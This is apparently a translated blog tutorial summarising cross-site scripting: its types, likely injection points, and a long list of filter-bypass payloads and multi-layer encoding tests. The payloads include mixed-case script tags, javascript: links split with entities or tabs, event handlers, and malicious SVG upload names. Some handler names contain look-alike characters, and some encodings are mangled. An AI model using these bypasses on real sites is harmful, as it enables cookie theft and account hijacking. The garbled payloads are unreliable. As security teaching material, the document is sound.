[Original] Summary of XSS attacks

Table of contents

1. XSS definition

2. The harm of XSS

3. XSS classification

4. Places where loopholes may occur

5. Attack methods

6. Character encoding and browser parsing principles

1. XSS definition

The formation principle of xss

The Chinese name of xss is "cross-site scripting attack", and the English name is "Cross Site Scripting".

The English abbreviation of Cross-site scripting should have been CSS, but because CSS has been widely referred to as Cascading Style Sheets in the field of web design, Cross (meaning "cross") was changed to a cross-shaped X. as an abbreviation. The principle is that the attacker inputs (passes in) malicious script code (HTML, JavaScript) into a website with XSS vulnerabilities. When other users visit the page containing malicious code, the malicious script will be parsed and executed by the browser, thereby achieving the attack. the goal of. Theoretically, if the input data is not processed in all input places, there will be XSS vulnerabilities. The harm of the vulnerability depends on the power of the attack code, and the attack code is not limited to script.

XSS attacks usually refer to exploiting vulnerabilities left during web development and injecting malicious instruction code into web pages through clever methods, allowing users to load and execute web programs maliciously created by attackers. These malicious web programs are usually JavaScript, but can also include Java, VBScript, ActiveX, Flash or even plain HTML. After a successful attack, the attacker may obtain higher permissions (such as performing some operations), private web content, sessions, cookies, and other content.

root cause

1. There are no constraints on the input and no encoding of the output.

2. There is no strict distinction between “data” and “code”

2. The harm of XSS

1. The user's cookie is obtained, which may contain sensitive information such as Session ID. If there is no corresponding protection on the server side, the attacker can use the corresponding cookie to log in to the server.

2. The attacker can record the user's keyboard input within certain limits.

3. Attackers perform dangerous operations as users through CSRF and other methods.

4. XSS worm.

5. Obtain user browser information.

6. Use XSS vulnerabilities to scan the user's intranet.

3. XSS classification

(1) Stored XSS

Stored XSS, malicious code is stored in the database and then taken out, resulting in XSS

It submits the attack code to the server-side database or file system without constructing a URL, but saves it in an article or forum post, so that users who visit the page may be attacked. It is also called "persistent xss" ". Persistent XSS is much more harmful than reflective XSS.

(2) Reflected XSS

Reflective XSS, generally speaking, does not store most of the data into the database, but only returns the get data directly to the front end.

reflection Known as "non-persistent xss".

The most intuitive one is to construct a URL to trick users into clicking. The parameter values constructed in the URL are immediately displayed on the page without any filtering and escaping processing. Another situation is to inject an XSS script into the search box.

DOM-based XSS

In one sentence: DOM-based XSS vulnerability is a vulnerability based on the Document Object Model (DOM).

DOM (Document Object Model), document object model

DOM is a document model described in an object-oriented manner. This is a common method for representing and processing an HTML or XML document.

It defines the objects required to represent and modify the document, the behavior and properties of these objects, and the relationships between these objects

DOM, you can think of it as a tree representation of the data and structure on the page

Dom-based XSS attacks are caused by improper use of JS scripts in operating document objects and URL addresses.

A piece of JS code that gets browser parameters and uses them to update a web page is easily exploitable.

The difference between DOM-type XSS is that DOM-type XSS is generally not directly related to the parsing response of the server, but is generated during the dynamic execution of JavaScript scripts.

4. Places where loopholes may occur

search bar

User login portal

message board

Comment

Blog log

error page

Position without parameters can also construct xss attacks

Find all entries containing user input.

Track every data flowing into your application.

Determine whether the data is relevant to the output.

If it relates to output, is it raw data, is it processed?

5. Attack methods

%3C, URL encoding %253C

< html decimal (the semicolon can be removed, and multiple 0s can be added in front of the number)

<htmlhex

\74, js octal

\x3c, js hexadecimal

\u003c，jsunicode

PA==, base64 encoding

If the input data is not processed in all input places, there will be XSS vulnerabilities. The harm of the vulnerability depends on the power of the attack code, and the attack code is not limited to script.

Commonly used

Case bypass

<sCrIpT>alert(1)</ScRiPt>

Various pop-up forms (pop-up, link injection, frame injection)

<video src=1 οnlοadstart=print(1)>Open the printer

<a> tag

<a href="javascript:alert(1)">Clickme</a>

<a href=//www.baidu.com>;

<a οnmοuseοver=alert(333)>222

<a οnclick=alert(333)>333

Do not use quotes

Do not use double quotes Use single quotes

<a href='javascrip&#116&#58alert(3)'>Clickme</a>

use/

space press enter tab

<a href="java script:alert(2)">Clickme</a>---tab键

Use keyword splitting techniques

Unclosed tag

Convert tag attribute values

<a href="javascrip&#116&#58alert(3)">Clickme</a>

You can also insert characters such as and into the head of javascript. In addition, tab , line break, and carriage return character can be inserted anywhere in the code.

<a href="javascript:alert(4)">Clickme</a>(note the use of semicolons)

Parentheses are not allowed

File upload injection --- file name

Used when the uploaded file name is reflected somewhere on the target page

"><svg οnlοad=alert(1)>.gif

File upload injection---svg files, img pictures, html/js files, etc.

For creating a stored xss on the target when uploading a file, save the following as xss.svg

xss.gif

Online scrolling universal xss vector

<img> tag

<iframe> tag

Malicious URLs are processed through various encodings to increase their confusion.

After decoding: <body οnlοad=alert(1)>

---alert(String.fromCharCode(72,69,76,76,79), W3school decodes as alert(HELLO)

---unicode encoding, after decoding, javascript:alert('XSS')

form tag

<form><button formaction=javascript:alert(1)>M

svg tag

<input> tag

How to trigger XSS in the input tag of the Hidden attribute

http://victim/?returnurl=” accesskey=”X” οnclick=”alert(document.domain)

For example, in Firefox, alt+shift+X triggers this vulnerability

html materialization bypass

The attacked page has the srcdoc attribute, which can bypass the html entity.

HTML5 new entity naming encoding

: => [colon]

=> [Line break]

<a href="javasc&NewLine;ript&colon;alert(1)">click</a>

6. Character encoding and browser parsing principles

(Reference to Part 6, A brief discussion of XSS—Character encoding and browser parsing principles_Q1n6-CSDN blog)

No matter what order the browser follows when parsing an HTML document, there are three main processes: HTML parsing, JS parsing and URL parsing. Each parser is responsible for parsing the corresponding part of the HTML document.

For the above a tag, analyze the browser's parsing order

First, the HTML parser starts working and performs HTML decoding on the characters in href. Next, the URL parser decodes the href value. Under normal circumstances, the URL value is a normal URL link, such as: "", then no other decoding is required after the URL parser is completed, but the URL resource type in this environment is JavaScript , so the last step of the JavaScript parser in this environment will also perform a decoding operation, and the last parsed script will be executed. https://www.xxx.com

The entire parsing sequence is three links: HTML decoding, URL decoding, and JS decoding.

test 1

URL encoding"javascript:alert(1)"="%6A%61%76%61%73%63%72%69%70%74:%61%6C%65%72%74%28%31 %29"

When I put it into HTML, I found that the script was not executed normally. The URL parser cannot perform any encoding operation on the protocol type. Otherwise, the URL parser will think that it has no type and the encoded "javascript" is not decoded.

test2

HTML character entity encoding "javascript", URL encoding "alert(2)"

HTML encoding"javascript"="javascri& ;#112;t"

URL encoding"alert(2)"="%61%6C%65%72%74%28%32%29"

Can be executed normally

test3

Perform JS encoding, URL encoding, and HTML encoding on <a href="javascript:alert(3)">test3</a>, a total of 3 layers

JS encoding: <a href="javascript:\u0061\u006c\u0065\u0072\u0074(3)">test3</a>

URL encoding: <a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c %75%30%30%37%32%5c%75%30%30%37%34(3)">test3</a>

HTML编码：<a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(3)">test3</a>

Can be executed normally

When the Javascript parser works, \u0061\u006c\u0065\u0072\u0074 is decoded into js and becomes "alert", and "alert" is a valid identifier name, which can be parsed normally.

Control characters such as parentheses, double quotes, single quotes, etc. will only be decoded into string literals when parsing JavaScript, for example: <script>alert('YISRC\u0027)</script> ; Perform js encoding on control character single quotes. When parsing, \u0027 is decoded into text single quotes, which cannot be closed and therefore cannot be executed successfully.

The corresponding parser can be executed after parsing at the corresponding layer, except for control characters.